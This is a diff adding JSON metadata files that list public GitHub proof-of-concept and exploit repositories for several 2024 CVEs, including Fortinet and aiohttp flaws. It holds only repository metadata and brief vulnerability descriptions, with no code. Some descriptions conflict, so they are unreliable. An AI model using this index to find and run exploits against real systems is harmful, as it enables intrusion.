"is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22922.json b/2024/CVE-2024-22922.json new file mode 100644 index 0000000000..7df623bed0 --- /dev/null +++ b/2024/CVE-2024-22922.json @@ -0,0 +1,33 @@ +[ + { + "id": 748143351, + "name": "CVE-2024-22922", + "full_name": "keru6k\/CVE-2024-22922", + "owner": { + "login": "keru6k", + "id": 73579653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73579653?v=4", + "html_url": "https:\/\/github.com\/keru6k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keru6k\/CVE-2024-22922", + "description": "A Broken Authentication Vulnerability found in Projectworlds' Visitor Management System", + "fork": false, + "created_at": "2024-01-25T11:14:43Z", + "updated_at": "2024-01-25T11:18:28Z", + "pushed_at": "2024-01-25T11:17:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22939.json b/2024/CVE-2024-22939.json new file mode 100644 index 0000000000..8f34f3ef7f --- /dev/null +++ b/2024/CVE-2024-22939.json @@ -0,0 +1,33 @@ +[ + { + "id": 748050298, + "name": "CVE-2024-22939", + "full_name": "NUDTTAN91\/CVE-2024-22939", + "owner": { + "login": "NUDTTAN91", + "id": 127911311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127911311?v=4", + "html_url": "https:\/\/github.com\/NUDTTAN91", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NUDTTAN91\/CVE-2024-22939", + "description": "CVE-2024-22939", + "fork": false, + "created_at": "2024-01-25T07:00:38Z", + "updated_at": "2024-04-08T02:43:41Z", + "pushed_at": "2024-01-25T07:30:38Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 32, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22983.json b/2024/CVE-2024-22983.json new file mode 100644 index 0000000000..4397418c66 --- /dev/null +++ b/2024/CVE-2024-22983.json @@ -0,0 +1,33 @@ +[ + { + "id": 748116927, + "name": "CVE-2024-22983", + "full_name": "keru6k\/CVE-2024-22983", + "owner": { + "login": "keru6k", + "id": 73579653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73579653?v=4", + "html_url": "https:\/\/github.com\/keru6k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keru6k\/CVE-2024-22983", + "description": "An SQL injection Vulnerability in projectworlds' Visitor Management System", + "fork": false, + "created_at": "2024-01-25T10:05:00Z", + "updated_at": "2024-01-25T10:05:00Z", + "pushed_at": "2024-02-17T12:05:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23002.json b/2024/CVE-2024-23002.json new file mode 100644 index 0000000000..7938ae0373 --- /dev/null +++ b/2024/CVE-2024-23002.json @@ -0,0 +1,33 @@ +[ + { + "id": 825318356, + "name": "CVE-2024-23002", + "full_name": "xiaomaoxxx\/CVE-2024-23002", + "owner": { + "login": "xiaomaoxxx", + "id": 99456979, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99456979?v=4", + "html_url": "https:\/\/github.com\/xiaomaoxxx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiaomaoxxx\/CVE-2024-23002", + "description": "this is test POC for git_rce ", + "fork": false, + "created_at": "2024-07-07T12:55:29Z", + "updated_at": "2024-07-07T13:18:11Z", + "pushed_at": "2024-07-07T13:18:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23108.json b/2024/CVE-2024-23108.json new file mode 100644 index 0000000000..9dacc10fd8 --- /dev/null +++ b/2024/CVE-2024-23108.json @@ -0,0 +1,64 @@ +[ + { + "id": 803339715, + "name": "CVE-2024-23108", + "full_name": "horizon3ai\/CVE-2024-23108", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-23108", + "description": "CVE-2024-23108: Fortinet FortiSIEM Unauthenticated 2nd Order Command Injection", + "fork": false, + "created_at": "2024-05-20T14:34:09Z", + "updated_at": "2024-11-20T16:30:47Z", + "pushed_at": "2024-05-21T11:56:19Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 31, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 807218249, + "name": "CVE-2024-23108", + "full_name": "hitem\/CVE-2024-23108", + "owner": { + "login": "hitem", + "id": 8977898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8977898?v=4", + "html_url": "https:\/\/github.com\/hitem", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hitem\/CVE-2024-23108", + "description": "POC iteration for CVE-2024-23108 which can use -l for list input", + "fork": false, + "created_at": "2024-05-28T17:21:11Z", + "updated_at": "2024-06-19T15:35:27Z", + "pushed_at": "2024-05-28T17:36:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23113.json b/2024/CVE-2024-23113.json new file mode 100644 index 0000000000..270a15ec17 --- /dev/null +++ b/2024/CVE-2024-23113.json @@ -0,0 +1,224 @@ +[ + { + "id": 871074826, + "name": "cve-2024-23113", + "full_name": "OxLmahdi\/cve-2024-23113", + "owner": { + "login": "OxLmahdi", + "id": 159675795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159675795?v=4", + "html_url": "https:\/\/github.com\/OxLmahdi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OxLmahdi\/cve-2024-23113", + "description": null, + "fork": false, + "created_at": "2024-10-11T08:13:10Z", + "updated_at": "2024-10-11T08:33:58Z", + "pushed_at": "2024-10-11T08:33:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 871254396, + "name": "CVE-2024-23113", + "full_name": "CheckCve2\/CVE-2024-23113", + "owner": { + "login": "CheckCve2", + "id": 184666422, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184666422?v=4", + "html_url": "https:\/\/github.com\/CheckCve2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CheckCve2\/CVE-2024-23113", + "description": "test_private_CVE", + "fork": false, + "created_at": "2024-10-11T15:16:00Z", + "updated_at": "2024-10-11T15:49:21Z", + "pushed_at": "2024-10-11T15:49:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 876057743, + "name": "CVE-2024-23113", + "full_name": "p33d\/CVE-2024-23113", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2024-23113", + "description": null, + "fork": false, + "created_at": "2024-10-21T10:27:52Z", + "updated_at": "2025-01-07T12:37:20Z", + "pushed_at": "2024-10-27T17:49:33Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 881252874, + "name": "CVE-2024-23113", + "full_name": "puckiestyle\/CVE-2024-23113", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2024-23113", + "description": null, + "fork": false, + "created_at": "2024-10-31T07:44:06Z", + "updated_at": "2024-10-31T07:46:06Z", + "pushed_at": "2024-10-31T07:46:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889028391, + "name": "CVE-2024-23113", + "full_name": "expl0itsecurity\/CVE-2024-23113", + "owner": { + "login": "expl0itsecurity", + "id": 185355311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185355311?v=4", + "html_url": "https:\/\/github.com\/expl0itsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/expl0itsecurity\/CVE-2024-23113", + "description": null, + "fork": false, + "created_at": "2024-11-15T13:23:19Z", + "updated_at": "2024-12-14T20:30:28Z", + "pushed_at": "2024-11-15T13:25:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892373700, + "name": "cve-2024-23113-exp", + "full_name": "XiaomingX\/cve-2024-23113-exp", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-23113-exp", + "description": "CVE-2024-23113 是一个严重的安全漏洞,影响 Fortinet 的多款产品,包括 FortiOS、FortiProxy、FortiPAM 和 FortiSwitchManager。该漏洞允许未经身份验证的远程攻击者通过特制的请求,在受影响的设备上执行任意代码或命令,可能导致系统被完全控制。", + "fork": false, + "created_at": "2024-11-22T01:46:58Z", + "updated_at": "2024-12-08T18:37:40Z", + "pushed_at": "2024-11-22T01:53:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exp", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895404057, + "name": "cve-2024-23113-poc", + "full_name": "XiaomingX\/cve-2024-23113-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-23113-poc", + "description": "CVE-2024-23113 是一个在 Linux Kernel 中被发现的漏洞,它属于 任意代码执行漏洞,影响了 bpf (Berkeley Packet Filter) 子系统。具体来说,这个漏洞影响了 bpf 程序的 bpf_prog 类型的对象,并且可以允许攻击者通过构造恶意的 BPF 程序来在内核空间执行恶意代码。", + "fork": false, + "created_at": "2024-11-28T06:30:02Z", + "updated_at": "2024-12-08T18:32:09Z", + "pushed_at": "2024-11-28T06:35:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23208.json b/2024/CVE-2024-23208.json new file mode 100644 index 0000000000..240db2d3b4 --- /dev/null +++ b/2024/CVE-2024-23208.json @@ -0,0 +1,33 @@ +[ + { + "id": 752559136, + "name": "CVE-2024-23208-test", + "full_name": "hrtowii\/CVE-2024-23208-test", + "owner": { + "login": "hrtowii", + "id": 68852354, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68852354?v=4", + "html_url": "https:\/\/github.com\/hrtowii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hrtowii\/CVE-2024-23208-test", + "description": null, + "fork": false, + "created_at": "2024-02-04T07:37:21Z", + "updated_at": "2024-09-23T11:23:29Z", + "pushed_at": "2024-02-05T02:11:42Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 20, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23298.json b/2024/CVE-2024-23298.json new file mode 100644 index 0000000000..43226993be --- /dev/null +++ b/2024/CVE-2024-23298.json @@ -0,0 +1,33 @@ +[ + { + "id": 905388354, + "name": "CVE-2024-23298.app", + "full_name": "p1tsi\/CVE-2024-23298.app", + "owner": { + "login": "p1tsi", + "id": 87305534, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87305534?v=4", + "html_url": "https:\/\/github.com\/p1tsi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p1tsi\/CVE-2024-23298.app", + "description": "PoC for CVE-2024-23298", + "fork": false, + "created_at": "2024-12-18T18:12:10Z", + "updated_at": "2024-12-20T08:39:25Z", + "pushed_at": "2024-12-18T18:15:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23334.json b/2024/CVE-2024-23334.json new file mode 100644 index 0000000000..a9c784ddfc --- /dev/null +++ b/2024/CVE-2024-23334.json @@ -0,0 +1,408 @@ +[ + { + "id": 764890801, + "name": "CVE-2024-23334", + "full_name": "ox1111\/CVE-2024-23334", + "owner": { + "login": "ox1111", + "id": 31942498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31942498?v=4", + "html_url": "https:\/\/github.com\/ox1111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ox1111\/CVE-2024-23334", + "description": "CVE-2024-23334", + "fork": false, + "created_at": "2024-02-28T22:30:21Z", + "updated_at": "2024-06-17T18:09:45Z", + "pushed_at": "2024-02-29T02:00:16Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773320217, + "name": "aiohttp-exploit-CVE-2024-23334-certstream", + "full_name": "sxyrxyy\/aiohttp-exploit-CVE-2024-23334-certstream", + "owner": { + "login": "sxyrxyy", + "id": 125439203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125439203?v=4", + "html_url": "https:\/\/github.com\/sxyrxyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxyrxyy\/aiohttp-exploit-CVE-2024-23334-certstream", + "description": null, + "fork": false, + "created_at": "2024-03-17T10:56:02Z", + "updated_at": "2024-06-17T18:09:46Z", + "pushed_at": "2024-03-18T12:25:54Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 774035199, + "name": "CVE-2024-23334-PoC", + "full_name": "z3rObyte\/CVE-2024-23334-PoC", + "owner": { + "login": "z3rObyte", + "id": 67548295, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67548295?v=4", + "html_url": "https:\/\/github.com\/z3rObyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3rObyte\/CVE-2024-23334-PoC", + "description": "A proof of concept of the path traversal vulnerability in the python AioHTTP library =< 3.9.1", + "fork": false, + "created_at": "2024-03-18T20:39:27Z", + "updated_at": "2024-12-31T08:05:58Z", + "pushed_at": "2024-03-19T06:37:30Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 774488632, + "name": "CVE-2024-23334", + "full_name": "jhonnybonny\/CVE-2024-23334", + "owner": { + "login": "jhonnybonny", + "id": 87495218, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87495218?v=4", + "html_url": "https:\/\/github.com\/jhonnybonny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jhonnybonny\/CVE-2024-23334", + "description": "aiohttp LFI (CVE-2024-23334)", + "fork": false, + "created_at": "2024-03-19T16:28:56Z", + "updated_at": "2024-12-09T08:17:11Z", + "pushed_at": "2024-03-19T17:06:26Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792749810, + "name": "poc-cve-2024-23334", + "full_name": "brian-edgar-re\/poc-cve-2024-23334", + "owner": { + "login": "brian-edgar-re", + "id": 111369381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111369381?v=4", + "html_url": "https:\/\/github.com\/brian-edgar-re", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brian-edgar-re\/poc-cve-2024-23334", + "description": "This repository contains a proof of concept about the exploitation of the aiohttp library for the reported vulnerability CVE-2024-23334.", + "fork": false, + "created_at": "2024-04-27T13:21:50Z", + "updated_at": "2024-04-29T01:40:19Z", + "pushed_at": "2024-04-29T01:40:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816384401, + "name": "CVE-2024-23334", + "full_name": "binaryninja\/CVE-2024-23334", + "owner": { + "login": "binaryninja", + "id": 5916066, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5916066?v=4", + "html_url": "https:\/\/github.com\/binaryninja", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/binaryninja\/CVE-2024-23334", + "description": "Expolit for CVE-2024-23334 (aiohttp >= 1.0.5> && <=3.9.1)", + "fork": false, + "created_at": "2024-06-17T16:28:35Z", + "updated_at": "2024-06-17T21:04:42Z", + "pushed_at": "2024-06-17T16:37:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854072083, + "name": "CVE-2024-23334-PoC", + "full_name": "s4botai\/CVE-2024-23334-PoC", + "owner": { + "login": "s4botai", + "id": 128468264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128468264?v=4", + "html_url": "https:\/\/github.com\/s4botai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s4botai\/CVE-2024-23334-PoC", + "description": "A proof of concept of the LFI vulnerability on aiohttp 3.9.1", + "fork": false, + "created_at": "2024-09-08T10:37:29Z", + "updated_at": "2024-12-29T17:16:18Z", + "pushed_at": "2024-09-08T10:49:44Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash-script", + "cybersecurity" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 875667799, + "name": "CVE-2024-23334", + "full_name": "wizarddos\/CVE-2024-23334", + "owner": { + "login": "wizarddos", + "id": 69435721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69435721?v=4", + "html_url": "https:\/\/github.com\/wizarddos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wizarddos\/CVE-2024-23334", + "description": "Proof-of-Concept for LFI\/Path Traversal vulnerability in Aiohttp =< 3.9.1", + "fork": false, + "created_at": "2024-10-20T15:28:58Z", + "updated_at": "2024-12-29T20:57:19Z", + "pushed_at": "2024-10-20T16:48:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 885051210, + "name": "CVE-2024-23334", + "full_name": "Pylonet\/CVE-2024-23334", + "owner": { + "login": "Pylonet", + "id": 135266995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135266995?v=4", + "html_url": "https:\/\/github.com\/Pylonet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pylonet\/CVE-2024-23334", + "description": null, + "fork": false, + "created_at": "2024-11-07T21:37:05Z", + "updated_at": "2024-11-24T14:33:40Z", + "pushed_at": "2024-11-24T14:33:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 885827821, + "name": "CVE-2024-23334-PoC", + "full_name": "Arc4he\/CVE-2024-23334-PoC", + "owner": { + "login": "Arc4he", + "id": 168012496, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168012496?v=4", + "html_url": "https:\/\/github.com\/Arc4he", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arc4he\/CVE-2024-23334-PoC", + "description": "Proof of concept of the parh traversal in python AioHTTP library =< 3.9.1", + "fork": false, + "created_at": "2024-11-09T13:59:28Z", + "updated_at": "2024-11-20T16:31:09Z", + "pushed_at": "2024-11-09T14:18:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 888709297, + "name": "LFI-aiohttp-CVE-2024-23334-PoC", + "full_name": "TheRedP4nther\/LFI-aiohttp-CVE-2024-23334-PoC", + "owner": { + "login": "TheRedP4nther", + "id": 136336480, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136336480?v=4", + "html_url": "https:\/\/github.com\/TheRedP4nther", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheRedP4nther\/LFI-aiohttp-CVE-2024-23334-PoC", + "description": "Bash script to automate Local File Inclusion (LFI) attacks on aiohttp server version 3.9.1.", + "fork": false, + "created_at": "2024-11-14T21:43:29Z", + "updated_at": "2024-11-20T17:11:26Z", + "pushed_at": "2024-11-15T16:20:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 900621696, + "name": "CVE-2024-23334-PoC", + "full_name": "Betan423\/CVE-2024-23334-PoC", + "owner": { + "login": "Betan423", + "id": 125627171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125627171?v=4", + "html_url": "https:\/\/github.com\/Betan423", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Betan423\/CVE-2024-23334-PoC", + "description": "This repository is a proof of concept (POC) for CVE-2024-23334, demonstrating an attempt to replicate the bug in aiohttp that leads to Local File Inclusion (LFI).", + "fork": false, + "created_at": "2024-12-09T06:51:13Z", + "updated_at": "2024-12-11T02:39:50Z", + "pushed_at": "2024-12-09T09:25:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 908206696, + "name": "CVE-2024-23334-PoC", + "full_name": "BestDevOfc\/CVE-2024-23334-PoC", + "owner": { + "login": "BestDevOfc", + "id": 164618346, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164618346?v=4", + "html_url": "https:\/\/github.com\/BestDevOfc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BestDevOfc\/CVE-2024-23334-PoC", + "description": "A proof of concept of the path traversal vulnerability in the python AioHTTP library =< 3.9.1", + "fork": false, + "created_at": "2024-12-25T12:50:59Z", + "updated_at": "2024-12-27T11:21:40Z", + "pushed_at": "2024-12-27T11:21:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23339.json b/2024/CVE-2024-23339.json new file mode 100644 index 0000000000..2be7d26aa6 --- /dev/null +++ b/2024/CVE-2024-23339.json @@ -0,0 +1,33 @@ +[ + { + "id": 845356081, + "name": "CVE-2024-23339", + "full_name": "200101WhoAmI\/CVE-2024-23339", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2024-23339", + "description": "pp", + "fork": false, + "created_at": "2024-08-21T05:03:32Z", + "updated_at": "2024-08-21T05:04:55Z", + "pushed_at": "2024-08-21T05:04:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23346.json b/2024/CVE-2024-23346.json new file mode 100644 index 0000000000..9933c245dc --- /dev/null +++ b/2024/CVE-2024-23346.json @@ -0,0 +1,64 @@ +[ + { + "id": 883761601, + "name": "CVE-2024-23346", + "full_name": "9carlo6\/CVE-2024-23346", + "owner": { + "login": "9carlo6", + "id": 45871476, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45871476?v=4", + "html_url": "https:\/\/github.com\/9carlo6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/9carlo6\/CVE-2024-23346", + "description": "This repository contains a Crystallographic Information File (CIF) intended for use on the \"Chemistry\" machine on Hack The Box (HTB).", + "fork": false, + "created_at": "2024-11-05T14:27:06Z", + "updated_at": "2024-12-30T10:41:03Z", + "pushed_at": "2024-11-05T14:32:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 901021337, + "name": "CVE-2024-23346", + "full_name": "MAWK0235\/CVE-2024-23346", + "owner": { + "login": "MAWK0235", + "id": 90433993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433993?v=4", + "html_url": "https:\/\/github.com\/MAWK0235", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MAWK0235\/CVE-2024-23346", + "description": "This is an exploit for CVE-2024-23346 that acts as a \"terminal\" (tested on chemistry.htb)", + "fork": false, + "created_at": "2024-12-09T22:34:44Z", + "updated_at": "2024-12-09T23:08:47Z", + "pushed_at": "2024-12-09T22:52:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + 